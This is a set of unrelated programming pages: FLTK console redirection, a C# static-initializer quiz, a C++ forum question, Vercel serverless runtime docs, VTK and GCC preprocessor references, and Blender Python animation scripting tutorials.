If you have an FLTK Windows GUI application (built with /subsystem:windows), you can create a DOS style window and redirect stdout/stderr to it at runtime. This shows a pretty simple way to do this using AllocConsole() and AttachConsole(), which can give a Windows application (that backgrounds itself) a way to display stdout/stderr.

#define _WIN32_WINNT 0x0501   // needed for AttachConsole
#include <windows.h>          // AllocConsole()
#include <Wincon.h>           // AttachConsole()
#include <stdio.h>
#include <stdlib.h>
#include <FL/Fl.H>
#include <FL/Fl_Window.H>

int main() {
    // Open a DOS style console, redirect stdout/stderr to it
    AllocConsole();
    AttachConsole(GetCurrentProcessId());
    freopen("CON", "w", stdout);
    freopen("CON", "w", stderr);
    printf("Hello world on stdout!\n");
    fprintf(stderr, "Hello world on stderr!\n");
    Fl_Window win(400,400);
    win.show();
    return Fl::run();
}

..and yes, you /could/ also compile your app with /SUBSYSTEM:CONSOLE to get similar results: this lets you see stdout/stderr in the DOS window you invoked the program from, or if you clicked on the app to run it, that first opens a separate DOS window then runs your app inside it. However, THIS example shows a way to /conditionally/ open a DOS style window for redirecting stdout/err in a /SUBSYSTEM:WINDOWS app, where the application runs in the background when invoked from a DOS terminal, which can be useful too. For instance, you could make the DOS style window only appear when needed, such as to display some debug info, then you can later make it go away with FreeConsole().
http://www.fltk.org/articles.php?L1549
Design Guidelines, Managed code and the .NET Framework

Clearly this code should fail a code review, but what would calling PrintValue() display?

public class Foo
{
    public static int Value = 42;

    static Foo()
    {
        Value = 17;
    }

    public static void PrintValue()
    {
        Console.WriteLine(Value);
    }
}

Same question, but in VB:

Class Foo
    Public Shared Value As Integer = 42

    Shared Sub New()
        Value = 17
    End Sub

    Public Shared Sub PrintValue()
        Console.WriteLine(Value)
    End Sub
End Class

Even more importantly, assuming we want Value to be initialized to 63, what is the best code and why? Setting the static field inline:

public static int Value = 63;

public static void PrintValue()
{
    Console.WriteLine(Value);
}

Or using a type constructor:

public static int Value;

static Foo()
{
    Value = 63;
}
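For what it's worth, the quiz above has a definite answer: in C#, inline static field initializers are emitted ahead of the explicit static constructor body, so Value is first set to 42 and then overwritten with 17, and PrintValue() displays 17 (the VB version behaves the same way). The equivalent sequence can be spelled out step by step in JavaScript (an analogy for illustration, not C# itself):

```javascript
// JavaScript analogue of the C# quiz. The inline initializer runs
// first, then the assignment that corresponds to the static
// constructor body overwrites it -- so the printed value is 17.
class Foo {
  static value = 42; // corresponds to: public static int Value = 42;

  static printValue() {
    console.log(Foo.value);
  }
}

// Corresponds to the body of the static constructor `static Foo()`:
Foo.value = 17;

Foo.printValue(); // 17
```

Note one difference worth remembering: JavaScript evaluates static members strictly in source order, whereas C# always runs the inline initializers before the static constructor body regardless of where they appear in the class.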
http://blogs.msdn.com/brada/archive/2004/08/15/214948.aspx
#include<iostream> #include <iomanip> #include<vector> #include "d_util.h" using namespace std; template <typename T> void writeVector(const vector<T>& v); int main() { vector<int>v; for (int n=0; n<=9; n++) { printf("A number between 0 and 9: %d\n", rand()%9);; v.push_back(n); n = v.size(); for(int i = 0; i < n; i++) cout << v[i] << " "; cout << endl; } writeVector(v); return 0; } This program runs and executes perfectly, however i need v.push_back to push back the random numbers and the writeVector to write the random numbers. can anybody point in that direction. This post has been edited by Videege: 26 October 2006 - 09:54 AM
http://www.dreamincode.net/forums/topic/20124-writing-vectors/
Official Runtimes

Runtimes are modules that transform your source code into Serverless Functions, which are served by our CDN at the edge. Listed below are all official Runtimes from Vercel.

Node.js (Status: Stable)

The Node.js Runtime, by default, builds and serves Serverless Functions within the /api directory of a project, providing the files have a file extension of either .js or .ts. A Node.js Serverless Function must export a default function handler, for example:

module.exports = (req, res) => {
  const { name = 'World' } = req.query;
  res.send(`Hello ${name}!`);
};

An example serverless Node.js function using the Request and Response objects.

If you need more advanced behavior, such as a custom build step or private npm modules, see the Advanced Node.js Usage section.

Node.js Version

Whenever a new Project is created, the latest Node.js LTS version available on Vercel at that time is selected for it. This selection will be reflected within the Node.js Version section on the General page of the Project Settings. If needed, you can also customize it there: Selecting a custom Node.js version for your Project. Currently, the following Node.js versions are available:

- 14.x (default since February 4th 2021)
- 12.x
- 10.x (disabled since April 20th 2021)

As you can see, only major versions are available. That's because Vercel will automatically roll out minor and patch updates if needed (for example in the case that a security issue needs to be fixed). Defining the node property inside engines of a package.json file will override the selection made in the Project Settings and print a Build Step warning if the version does not match. In order to find out which Node.js version your Deployment is using, run node -v in the Build Command or log the output of process.version.

Node.js Dependencies

For dependencies listed in a package.json file at the root of a project, the following behavior is used:

- If a package-lock.json file is present in the project, npm install is used.
- Otherwise, yarn is used, by default.

Using TypeScript with the Node.js Runtime:

import { VercelRequest, VercelResponse } from '@vercel/node';

export default function (req: VercelRequest, res: VercelResponse) {
  const { name = 'World' } = req.query;
  res.send(`Hello ${name}!`);
}

An example serverless Node.js function written in TypeScript, using types from the @vercel/node module for the helper methods.

The VercelRequest and VercelResponse imports in the above example are types that we provide for the Request and Response objects, including the helper methods with Vercel. These types can be installed from npm with the following command:

npm install @vercel/node --save-dev

Installing @vercel/node for types when using Node.js on Vercel.

You can also use a tsconfig.json file at the root of your project to configure the TypeScript compiler. Most options are supported aside from "Path Mappings" and "Project References".

Node.js Request and Response Objects

Each request to a Node.js Serverless Function gives access to Request and Response objects. These objects are the standard HTTP Request and Response objects from Node.js.

Node.js Helpers

Vercel additionally provides helper methods inside of the Request and Response objects passed to Node.js Serverless Functions. These methods are: The following Node.js Serverless Function uses the req.query, req.cookies, and req.body helpers; it returns a greeting for the specified user using req.send(). These helpers can be disabled using advanced configuration.

Request Body

We populate the req.body property with a parsed version of the content sent with the request when possible. We follow a set of rules on the Content-type header sent by the request to do so: With the req.body helper, you can build applications without extra dependencies or having to parse the content of the request manually. The req.body helper is set using a JavaScript getter. In turn, it is only computed when it is accessed.
When the request body contains malformed JSON, accessing req.body will throw an error. You can catch that error by wrapping req.body with try...catch:

try {
  req.body;
} catch (error) {
  return res.status(400).json({ error: 'My custom 400 error' });
}

Catching the error thrown by req.body with try...catch.

Go (Status: Alpha)

The Go Runtime is used by Vercel to compile Go Serverless Functions that expose a single HTTP handler, from a .go file within an /api directory at your project's root. For example, define an index.go file inside an /api directory as follows:

package handler

import (
	"fmt"
	"net/http"
)

func Handler(w http.ResponseWriter, r *http.Request) {
	fmt.Fprintf(w, "<h1>Hello from Go!</h1>")
}

An example index.go file inside an /api directory. For advanced usage, such as using private packages with your Go projects, see the Advanced Go Usage section. Note: the exported function must match the net/http HandlerFunc signature type, but can use any valid Go exported function declaration as the function name.

Go Version

The Go Runtime will automatically detect the go.mod file at the root of your Project to determine the version of Go to use. If go.mod is missing or the version is not defined, the default version 1.16 will be used.

Go Dependencies

The Go Runtime will automatically detect the go.mod file at the root of your Project to install dependencies.

Go Build Configuration

You can provide custom build flags by using the GO_BUILD_FLAGS Environment Variable.

{
  "build": {
    "env": {
      "GO_BUILD_FLAGS": "-ldflags '-s -w'"
    }
  }
}

An example -ldflags flag with -s -w. This will remove debug information from the output file. This is the default value when no GO_BUILD_FLAGS are provided.

Python (Status: Beta)

The Python Runtime is used by Vercel to compile Python Serverless Functions that define a single HTTP handler variable, inheriting from the BaseHTTPRequestHandler class, from a .py file within an /api directory at your project's root.
For example, define an index.py file inside an /api directory as follows: from http.server import BaseHTTPRequestHandler from cowpy import cow class handler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-type','text/plain') self.end_headers() message = cow.Cowacter().milk('Hello from Python from a Serverless Function!') self.wfile.write(message.encode()) return An example index.py file inside an /api directory. Inside requirements.txt define: cowpy==1.0.3 An example requirements.txt file that defines cowpy as a dependency. For advanced usage, such as using WSGI or ASGI for your Python projects, see the Advanced Python Usage section. Python Version Python projects deployed with Vercel use Python version 3.6. Python Dependencies You can install dependencies for your Python projects by defining them in a requirements.txt or a Pipfile.lock file. Ruby — Status: Alpha The Ruby Runtime is used by Vercel to compile Ruby Serverless Functions that define a singular HTTP handler from .rb files within an /api directory at your project's root. Ruby files must have one of the following variables defined: A Handler proc that matches the do |req, res| signature. A Handler class that inherits from the WEBrick::HTTPServlet::AbstractServlet class. For example, define an index.rb file inside an /api directory as follows: require 'cowsay' Handler = Proc.new do |req, res| name = req.query['name'] || 'World' res.status = 200 res['Content-Type'] = 'text/text; charset=utf-8' res.body = Cowsay.say("Hello #{name}", 'cow') end An example index.rb file inside an /api directory. Inside a Gemfile define: source "" gem "cowsay", "~> 0.3.0" An example Gemfile that defines cowsay as a dependency. Ruby Version New deployments use Ruby 2.7.x as the default version.
You can specify the version of Ruby by defining ruby in a Gemfile, like so: source "" ruby "~> 2.7.x" When defining a Ruby version, the following Ruby versions can be selected: - 2.7.x (default) - 2.5.x If a patch version such as 2.5.5 is defined, it will be ignored and the latest 2.5.x will be assumed. Ruby Dependencies This Runtime supports installing dependencies defined in the Gemfile. Alternatively, dependencies can be vendored with the bundler install --deployment command (useful for gems that require native extensions). In this case, dependencies are not built on deployment. Advanced Usage By default, no configuration is needed to deploy Serverless Functions to Vercel. For all officially supported languages (see below), the only requirement is creating an api directory and placing your Serverless Functions inside. In order to customize the Memory or Maximum Execution Duration of your Serverless Functions, you can use the functions property. Community Runtimes If you would like to use a language that Vercel does not support by default, you can use a Community Runtime by setting the functions property in vercel.json: { "functions": { "api/test.php": { "runtime": "vercel-php@0.1.0" } } } The following Community Runtimes are recommended by Vercel: Advanced Node.js Usage In order to use this Runtime, no configuration is needed. You only need to create a file inside the api directory. The entry point for src must be a glob matching .js or .ts files that export a default function. For more information on using this Runtime, see the Node.js Runtime section. Disabling Helpers for Node.js Add an Environment Variable with name NODEJS_HELPERS and value 0 to disable helpers. Private npm Modules for Node.js To install private npm modules, define NPM_TOKEN as an Environment Variable in your Project. Alternatively, define NPM_RC as an Environment Variable with the contents of ~/.npmrc. Custom Build Step for Node.js In some cases, you may wish to include build outputs inside your Serverless Function.
You can run a build task by adding a vercel-build script within your package.json file, in the same directory as your Serverless Function or any parent directory. The package.json nearest to the Serverless Function will be preferred and used for both Installing and Building. For example: { "scripts": { "vercel-build": "node ./build.js" } } An example package.json file with a vercel-build script to execute in the build step. Along with a build script named build.js: const fs = require('fs'); fs.writeFile('built-time.js', `module.exports = '${new Date()}'`, (err) => { if (err) throw err; console.log('Build time file created successfully!'); }); An example Node.js file, executed by the above package.json build script. And a .js file for the built Serverless Functions, index.js inside the /api directory: const BuiltTime = require('./built-time'); module.exports = (req, res) => { res.setHeader('content-type', 'text/plain'); res.send(` This Serverless Function was built at ${new Date(BuiltTime)}. The current time is ${new Date()} `); }; An example Node.js Serverless Function, using information from the created file from the build script. Legacy Serverful Behavior A Node.js Runtime entrypoint can contain one of the following to retain legacy serverful behavior: - Default export server, such as module.exports = http.createServer((req, res) => { res.end('hello') }). - Server listens on a port, such as http.createServer((req, res) => { res.end('hello') }).listen(3000). AWS Lambda API The Node.js Runtime provides a way to opt into the AWS Lambda API. This is useful if you have existing Serverless Functions you wish to deploy to Vercel but do not want to change the API.
exports.handler = async function (event, context, callback) { return { statusCode: 200, headers: {}, body: 'Hello world', }; }; { "build": { "env": { "NODEJS_AWS_HANDLER_NAME": "handler" } } } The value of the environment variable needs to match the name of the method that is exported from your Serverless Functions. Advanced Go Usage In order to use this Runtime, no configuration is needed. You only need to create a file inside the api directory. The entry point of this Runtime is a glob matching .go files that export a function that implements the http.HandlerFunc signature. For more information on using this Runtime, see the Go Runtime section. Private Packages for Go To install private packages with go get, add an Environment Variable named GIT_CREDENTIALS. The value should be the URL to the Git repo including credentials. All major Git providers are supported including GitHub, GitLab, and Bitbucket, as well as self-hosted Git servers. With GitHub, you will need to create a personal token with permission to access your private repository. Advanced Python Usage In order to use this Runtime, no configuration is needed. You only need to create a file inside the api directory. The entry point of this Runtime is a glob matching .py source files with one of the following variables defined: A handler that inherits from the BaseHTTPRequestHandler class. An app that exposes a WSGI or ASGI Application. Reading Relative Files in Python Python uses the current working directory when a relative file is passed to open(). The current working directory is the base of your project, not the api/ directory. For example, consider the following directory structure: ├── README.md ├── api | ├── user.py ├── data | └── file.txt └── requirements.txt With the above directory structure, your function in api/user.py can read the contents of data/file.txt in a couple of different ways. You can use the path relative to the project's base directory.
# api/user.py from http.server import BaseHTTPRequestHandler from os.path import join class handler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-type','text/plain') self.end_headers() with open(join('data', 'file.txt'), 'r') as file: for line in file: self.wfile.write(line.encode()) return Or you can use the path relative to the current file's directory. # api/user.py from http.server import BaseHTTPRequestHandler from os.path import dirname, abspath, join dir = dirname(abspath(__file__)) class handler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-type','text/plain') self.end_headers() with open(join(dir, '..', 'data', 'file.txt'), 'r') as file: for line in file: self.wfile.write(line.encode()) return Web Server Gateway Interface The Web Server Gateway Interface (WSGI) is a calling convention for web servers to forward requests to web applications written in Python. You can use WSGI with frameworks such as Flask. Instead of defining a handler, define an app variable in your Python file. For example, define an index.py file inside your project as follows: from flask import Flask, Response app = Flask(__name__) @app.route('/', defaults={'path': ''}) @app.route('/<path:path>') def catch_all(path): return Response("<h1>Flask</h1><p>You visited: /%s</p>" % (path), mimetype="text/html") An example index.py file, using Flask for a WSGI application. Inside requirements.txt define: flask==1.0.2 An example requirements.txt file, listing flask as a dependency. Asynchronous Server Gateway Interface The Asynchronous Server Gateway Interface (ASGI) is a calling convention for web servers to forward requests to asynchronous web applications written in Python. You can use ASGI with frameworks such as Sanic. Instead of defining a handler, define an app variable in your Python file. For example, define an index.py file inside a folder as follows: from sanic import Sanic from sanic.response import json app = Sanic() @app.route('/') @app.route('/<path:path>') async def index(request, path=""): return json({'hello': path}) An example index.py file, using Sanic for an ASGI application.
Inside requirements.txt define: sanic==19.6.0 An example requirements.txt file, listing sanic as a dependency. Developing Your Own Runtime Extending the feature-set of a Vercel deployment is as simple as creating a Runtime that takes a list of files and outputs either static files or dynamic Serverless Functions. A full API reference is available to help with creating Runtimes. Technical Details Caching Data A runtime can retain an archive of up to 100mb of the filesystem at build time. The cache key is generated as a combination of: - Project name. - Team id or user id. - Entrypoint path (e.g., api/users/index.go). - Runtime identifier including version (e.g., @vercel/go@0.0.1). The cache will be invalidated if any of those items changes. The user can bypass the cache by running vercel -f. Limits - Runtimes can run for a maximum of 5 minutes before the execution times out. - The maximum cache archive size of a Runtime is 100mb. - The cache TTL is 7 days. Including Additional Files Most Runtimes use static analysis to determine which source files should be included in the Serverless Function output based on the build src input. Any unused code or assets are ignored to ensure your Serverless Function is as small as possible. For example, the Node Runtime looks at calls to require() or fs.readFile() in order to determine which files to include automatically. // index.js const { readFileSync } = require('fs'); const { join } = require('path'); const file = readFileSync(join(__dirname, 'config', 'ci.yml'), 'utf8'); This /index.js file reads the contents of /config/ci.yml. The use of __dirname is necessary to read a file relative to the current file. In some cases, you may wish to include templates or views that are not able to be statically analyzed. Runtimes provide a configuration for includeFiles that accepts a glob of files that will always be included in the Serverless Functions output.
{ "functions": { "api/test.js": { "includeFiles": "templates/**" } } } Using the default Node.js language and configuring the includeFiles within a vercel.json configuration file.
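To get a feel for what a glob such as templates/** selects, the filtering can be sketched in Python. The included helper is hypothetical, and fnmatch is only an approximation of real glob semantics (its * also crosses path separators, which conveniently mimics ** here):

```python
import fnmatch

def included(paths, pattern):
    # Files matching the includeFiles glob are always bundled into the
    # Serverless Function output, regardless of static analysis.
    return [p for p in paths if fnmatch.fnmatch(p, pattern)]

files = ['api/test.js', 'templates/mail/welcome.html',
         'templates/home.html', 'static/logo.svg']
print(included(files, 'templates/**'))
# → ['templates/mail/welcome.html', 'templates/home.html']
```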
https://vercel.com/docs/runtimes?query=runtime
class used to assign an Id to any VTK object and be able to retrieve it based on its id. #include <vtkObjectIdMap.h> class used to assign an Id to any VTK object and be able to retrieve it based on its id. Definition at line 30 of file vtkObjectIdMap.h. Definition at line 34 of file vtkObjectIdMap.h. Return 1 if this class is the same type of (or a subclass of) the named class. Returns 0 otherwise. This method works in combination with vtkTypeMacro found in vtkSetGet.h. Reimplemented from vtkObjectBase. Retrieve a unique identifier for the given object or generate a new one if its global id was never requested. Retrieve a previously stored object based on a name. Remove any internal reference count due to internal Id/Object mapping.
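The class's two-way mapping can be sketched in plain Python. This ObjectIdMap class and its method names are a loose, hypothetical analogue of the idea, not the VTK implementation:

```python
class ObjectIdMap:
    """Hand out a unique id per object and allow lookup in both directions."""

    def __init__(self):
        self._next = 1
        self._by_id = {}    # id -> object
        self._by_obj = {}   # id(object) -> id

    def get_global_id(self, obj):
        # Reuse the id if this object was seen before, otherwise mint one.
        if id(obj) not in self._by_obj:
            self._by_obj[id(obj)] = self._next
            self._by_id[self._next] = obj
            self._next += 1
        return self._by_obj[id(obj)]

    def get_object(self, gid):
        # Retrieve a previously stored object, or None if unknown.
        return self._by_id.get(gid)

m = ObjectIdMap()
a, b = object(), object()
assert m.get_global_id(a) == m.get_global_id(a)   # stable per object
assert m.get_global_id(a) != m.get_global_id(b)   # unique across objects
assert m.get_object(m.get_global_id(b)) is b
```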
https://vtk.org/doc/nightly/html/classvtkObjectIdMap.html
Next: If, Up: Conditional Syntax The simplest sort of conditional is #ifdef MACRO controlled text #endif /* MACRO */ This block is called a conditional group. controlled text will be included in the output of the preprocessor if and only if MACRO is defined. We say that the conditional succeeds if MACRO is defined, fails if it is not. The controlled text inside of a conditional can include preprocessing directives. They are executed only if the conditional succeeds. You can nest conditional groups inside other conditional groups, but they must be completely nested. In other words, `#endif' always matches the nearest `#ifdef' (or `#ifndef', or `#if'). Also, you cannot start a conditional group in one file and end it in another. The comment following the `#endif' is not required, but it is a good practice if there is a lot of controlled text, because it helps people match the `#endif' to the corresponding `#ifdef'. Older programs sometimes put MACRO directly after the `#endif' without enclosing it in a comment. This is invalid code according to the C standard. CPP accepts it with a warning. It never affects which `#ifndef' the `#endif' matches. Sometimes you wish to use some code if a macro is not defined. You can do this by writing `#ifndef' instead of `#ifdef'. One common use of `#ifndef' is to include code only the first time a header file is included. See Once-Only Headers. Macro definitions can vary between compilations for several reasons. Here are some samples.
http://gcc.gnu.org/onlinedocs/gcc-3.3.6/cpp/Ifdef.html
A touchy subject—defining an IPO from scratch Many paths of motion of objects are hard to model by hand, for example, when we want the object to follow a precise mathematical curve or if we want to coordinate the movement of multiple objects in a way that is not easily accomplished by copying IPOs or defining IPO drivers. Imagine the following scenario: we want to interchange the position of some objects over the duration of some time in a fluid way without those objects passing through each other in the middle and without even touching each other. This would be doable by manually setting keys perhaps, but also fairly cumbersome, especially if we would want to repeat this for several sets of objects. The script that we will devise takes care of all of those details and can be applied to any two objects. Code outline: orbit.py The orbit.py script that we will design will take the following steps: - Determine the halfway point between the selected objects. - Determine the extent of the selected objects. - Define IPO for object one. - Define IPO for object two. Determining the halfway point between the selected objects is easy enough: we will just take the average location of both objects. Determining the extent of the selected objects is a little bit more challenging though. An object may have an irregular shape and determining the shortest distance for any rotation of the objects along the path that the object will be taking is difficult to calculate. Fortunately, we can make a reasonable approximation, as each object has an associated bounding box. This bounding box is a rectangular box that just encapsulates all of the points of an object. If we take half the body diagonal as the extent of an object, then it is easy to see that this distance may be an exaggeration of how close we can get to another object without touching, depending on the exact form of the object. But it will ensure that we never get too close. 
This bounding box is readily available from an object's getBoundBox() method as a list of eight vectors, each representing one of the corners of the bounding box. The concept is illustrated in the following figure where the bounding boxes of two spheres are shown: The length of the body diagonal of a bounding box can be calculated by determining both the maximum and minimum values for each x, y, and z coordinate. The components of the vector representing this body diagonal are the differences between these maximums and minimums. The length of the diagonal is subsequently obtained by taking the square root of the sum of squares of the x, y, and z components. The function diagonal() is a rather terse implementation as it uses many built-in functions of Python. It takes a list of vectors as an argument and then iterates over each component (highlighted; the x, y, and z components of a Blender Vector may be accessed as indices 0, 1, and 2 respectively): def diagonal(bb): maxco=[] minco=[] for i in range(3): maxco.append(max(b[i] for b in bb)) minco.append(min(b[i] for b in bb)) return sqrt(sum((a-b)**2 for a,b in zip(maxco,minco))) It determines the extremes for each component by using the built-in max() and min() functions. Finally, it returns the length by pairing each minimum and maximum by using the zip() function. The next step is to verify that we have exactly two objects selected and inform the user if this isn't the case by drawing a pop up (highlighted in the next code snippet). If we do have two objects selected, we retrieve their locations and bounding boxes.
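Since diagonal() only indexes its inputs, it can be exercised outside Blender with plain tuples; the unit-cube check below is an illustration, not part of the original script:

```python
from math import sqrt

def diagonal(bb):
    # bb is a list of corner points, each indexable as (x, y, z),
    # exactly like the vectors returned by getBoundBox() in Blender.
    maxco = [max(b[i] for b in bb) for i in range(3)]
    minco = [min(b[i] for b in bb) for i in range(3)]
    return sqrt(sum((a - b) ** 2 for a, b in zip(maxco, minco)))

# A unit cube: its body diagonal is sqrt(3)
cube = [(x, y, z) for x in (0, 1) for y in (0, 1) for z in (0, 1)]
print(diagonal(cube))  # → 1.7320508075688772
```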
Then we calculate the maximum distance w each object has to veer from its path to be half the minimum distance between them, which is equal to a quarter of the sum of the lengths of the body diagonals of those objects: obs=Blender.Scene.GetCurrent().objects.selected if len(obs)!=2: Draw.PupMenu('Please select 2 objects%t|Ok') else: loc0 = obs[0].getLocation() loc1 = obs[1].getLocation() bb0 = obs[0].getBoundBox() bb1 = obs[1].getBoundBox() w = (diagonal(bb0)+diagonal(bb1))/4.0 Before we can calculate the trajectories of both objects, we first create two new and empty Object IPOs: ipo0 = Ipo.New('Object','ObjectIpo0') ipo1 = Ipo.New('Object','ObjectIpo1') We arbitrarily choose the start and end frames of our swapping operation to be 1 and 30 respectively, but the script could easily be adapted to prompt the user for these values. We iterate over each separate IPO curve for the Location IPO and create the first point (or key frame) and thereby the actual curve by assigning a tuple (framenumber, value) to the curve (highlighted lines of the next code). Subsequent points may be added to these curves by indexing them by frame number when assigning a value, as is done for frame 30 in the following code: for i,icu in enumerate((Ipo.OB_LOCX,Ipo.OB_LOCY,Ipo.OB_LOCZ)): ipo0[icu]=(1,loc0[i]) ipo0[icu][30]=loc1[i] ipo1[icu]=(1,loc1[i]) ipo1[icu][30]=loc0[i] ipo0[icu].interpolation = IpoCurve.InterpTypes.BEZIER ipo1[icu].interpolation = IpoCurve.InterpTypes.BEZIER Note that the location of the first object keyframed at frame 1 is its current location and the location keyframed at frame 30 is the location of the second object. For the other object this is just the other way around. We set the interpolation modes of these curves to "Bezier" to get a smooth motion. We now have two IPO curves that do interchange the location of the two objects, but as calculated they will move right through each other. 
Our next step therefore is to add a key at frame 15 with an adjusted z-component. Earlier, we calculated w to hold half the distance needed to keep out of each other's way. Here we add this distance to the z-component of the halfway point of the first object and subtract it for the other: mid_z = (loc0[2]+loc1[2])/2.0 ipo0[Ipo.OB_LOCZ][15] = mid_z + w ipo1[Ipo.OB_LOCZ][15] = mid_z - w Finally, we add the new IPOs to our objects: obs[0].setIpo(ipo0) obs[1].setIpo(ipo1) The full code is available as swap2.py in the file orbit.blend. The resulting paths of the two objects are sketched in the next screenshot: A lot to swallow—defining poses Many cartoon characters seem to have difficulties trying to swallow their food, and even if they did enjoy a relaxing lunch, chances are they will be forced through a rain pipe too small to fit comfortably for no apparent reason. It is difficult to animate swallowing or any other peristaltic movement by using shape keys as it is not the shape of the overall mesh that changes in a uniform way: we want to move along a localized deformation. One way of doing that is to associate an armature consisting of a linear chain of bones with the mesh that we want to deform (shown in the illustration) and animate the scale of each individual bone in time. This way, we can control the movement of the 'lump' inside to a great extent. It is, for example, possible to make the movement a little bit halting as it moves from bone to bone to simulate something that is hard to swallow. In order to synchronize the scaling of the individual bones in a way that follows the chain from parent to child, we have to sort our bones because the bones attribute of the Pose object that we get when calling getPose() on an armature is a dictionary. Iterating over the keys or values of this dictionary will return those values in random order.
Therefore, we define a function sort_by_parent() that will take a list of Pose bones pbones and will return a list of strings, each the name of a Pose bone. The list is sorted with the parent as the first item followed by its children. Obviously, this will not return a meaningful list for armatures that have bones with more than one child, but for our linear chain of bones it works fine. In the following code, we maintain a list of names called bones that hold the names of the Pose bones in the correct order. We pop the list of Pose bones and add the name of the Pose bone as long as it is not already added (highlighted). We compare names instead of Pose bone objects because the current implementation of Pose bones does not reliably implement the in operator: def sort_by_parent(pbones): bones=[] if len(pbones)<1 : return bones bone = pbones.pop(0) while(not bone.name in bones): bones.append(bone.name) We then get the parent of the bone that we just added to our list, and as long as we can traverse the chain of parents, we insert this parent (or rather its name) in our list in front of the current item (highlighted below). If the chain cannot be followed anymore we pop a new Pose bone. When there are no bones left, an IndexError exception is raised by the pop() method and we will exit our while-loop: parent = bone.parent while(parent): if not parent.name in bones: bones.insert(bones.index(bone.name),parent.name) parent = parent.parent bone = parent try: bone = pbones.pop(0) except IndexError: break return bones The next step is to define the script itself. First, we get the active object in the current scene and verify if it is indeed an armature. 
If not, we alert the user with a pop up (highlighted part of the following code), otherwise we proceed and get the associated armature data with the getData() method: scn = Blender.Scene.GetCurrent() arm = scn.objects.active if arm.getType()!='Armature': Blender.Draw.PupMenu("Selected object is not an Armature%t|Ok") else: adata = arm.getData() Then, we make the armature editable and make sure that each bone has the HINGE option set (highlighted). The business with the conversion of the list of options to a set and back again to a list once we added the HINGE option is a way to ensure that the option appears only once in the list. adata.makeEditable() for ebone in adata.bones.values(): ebone.options = list(set(ebone.options)|set([Blender.Armature.HINGE])) adata.update() A pose is associated with an armature object, not with its data, so we get it from arm by using the getPose() method. Bone poses are very much like ordinary IPOs but they have to be associated with an action that groups those poses. When working interactively with Blender, an action gets created automatically once we insert a key frame on a pose, but in a script we have to create an action explicitly if it is not present already (highlighted): pose = arm.getPose() action = arm.getAction() if not action: action = Blender.Armature.NLA.NewAction() action.setActive(arm) The next step is to sort the Pose bones as a chain of parenthood by using our previously defined function. What is left is to step along the frames in steps of ten at a time and set keys on the scale of each bone at each step, scaling up if the sequence number of the bone matches our step and resetting it if it doesn't. One of the resulting IPOs is shown in the screenshot.
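Because sort_by_parent() only touches name and parent attributes, it can be unit-tested outside Blender with a stand-in Bone class. Note that the indentation of the inner loop was lost in the listing above; the statement order below (follow the chain upward with bone before advancing parent) is one consistent reconstruction:

```python
class Bone:
    # A minimal stand-in for Blender's pose bones.
    def __init__(self, name, parent=None):
        self.name = name
        self.parent = parent

def sort_by_parent(pbones):
    bones = []
    if len(pbones) < 1:
        return bones
    bone = pbones.pop(0)
    while not bone.name in bones:
        bones.append(bone.name)
        parent = bone.parent
        while parent:
            if not parent.name in bones:
                # Insert the parent just before the current item
                bones.insert(bones.index(bone.name), parent.name)
            bone = parent
            parent = parent.parent
        try:
            bone = pbones.pop(0)
        except IndexError:
            break
    return bones

a = Bone('Bone')           # root
b = Bone('Bone.001', a)
c = Bone('Bone.002', b)
print(sort_by_parent([c, a, b]))  # → ['Bone', 'Bone.001', 'Bone.002']
```

Whatever order the dictionary yields the bones in, the parent always ends up first.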
Note that by our setting the HINGE attribute on each bone previously, we prevent the scaling to propagate to the children of the bone: bones = sort_by_parent(pose.bones.values()) for frame in range(1,161,10): index = int(frame/21)-1 n = len(bones) for i,bone in enumerate(bones): if i == index : size = 1.3 else : size = 1.0 pose.bones[bone].size=Vector(size,size,size) pose.bones[bone].insertKey(arm,frame, Blender.Object.Pose.SIZE) The full code is available as peristaltic.py in peristaltic.blend. Application of peristaltic.py to an armature To use this script you will have to run it with an armature object selected. One recipe to show its application would be the following: - Add an armature to a scene. - Go to edit mode and extrude any number of bones from the tip of the first bone. - Go to object mode and add a mesh centered on the position of the armature. Any mesh will do but for our illustration we use a cylinder with plenty of subdivisions. - Select the mesh and then shift select the armature. Both armature and Mesh object are now selected while the armature is the active object. - Press Ctrl + P and select armature. In next pop up, select Create from bone heat. That will create a vertex group on the mesh for each bone in the armature. These vertex groups will be used to deform the mesh when we associate the armature as a modifier with the mesh. - Select the mesh and add an armature modifier. Type the name of the armature in the Ob: field and make sure that the Vert.Group toggle is selected and Envelopes is not. - Select the armature and run the peristaltic.py. The result will be an animated Mesh object resembling a lump passing through a narrow flexible pipe. 
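The frame-to-bone schedule produced by the key-framing loop above can be checked in plain Python; active_bone is a hypothetical helper mirroring the index = int(frame/21)-1 arithmetic from the script:

```python
def active_bone(frame, nbones):
    # Which bone (if any) is scaled up to 1.3 at this frame;
    # all other bones are reset to a scale of 1.0.
    index = int(frame / 21) - 1
    return index if 0 <= index < nbones else None

# The same frame steps the script uses: 1, 11, 21, ... 151
schedule = [(f, active_bone(f, 5)) for f in range(1, 161, 10)]
print(schedule[:4])  # → [(1, None), (11, None), (21, 0), (31, 0)]
```

The lump therefore lingers on each bone for a couple of key frames before moving on, which is what gives the motion its halting, swallowing quality.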
A few frames are shown in the illustration: Rain pipes are of course not the only hollow objects fit for animating this way as shown in the following illustration: Get down with the beat—syncing shape keys to sound Many a rock video today features an animation of speaker cones reverberating with the sound of the music. And although the features for the manipulation of sound in the Blender API are rather sparse, we will see that this effect is rather simple to achieve. The animation that we will construct depends mainly on the manipulation of shape keys. Shape keys can be understood as distortions of a base mesh. A mesh can have many of these distortions and each of them is given a distinct name. The fun part is that Blender provides us with the possibility to interpolate between the base shape and any of the distorted shapes in a continuous way, even allowing us to mix contributions from different shapes. One way to animate our speaker cone, for instance, is to model a basic, undistorted shape of the cone; add a shape key to this base mesh; and distort it to resemble a cone that is pushed outward. We can then blend between this "pop out" shape and the base's shape depending on the loudness of the sound. Animating by setting key frames in Blender means creating IPOs and manipulating IPO curves as we have seen earlier. Indeed, Shape or Key IPOs are very similar to other kinds of IPOs and are manipulated very much in the same way. The main difference between for example an Object IPO and a Shape IPO is that the individual IPO curves of a Shape IPO are not indexed by some predefined numerical constant (such as Ipo.OB_LOCX for an Object) but by a string because the user may define any number of named shapes. Also, a Shape IPO is not accessed via an Object but through its underlying Mesh object (or Lattice or Curve, as these may have shape keys as well). 
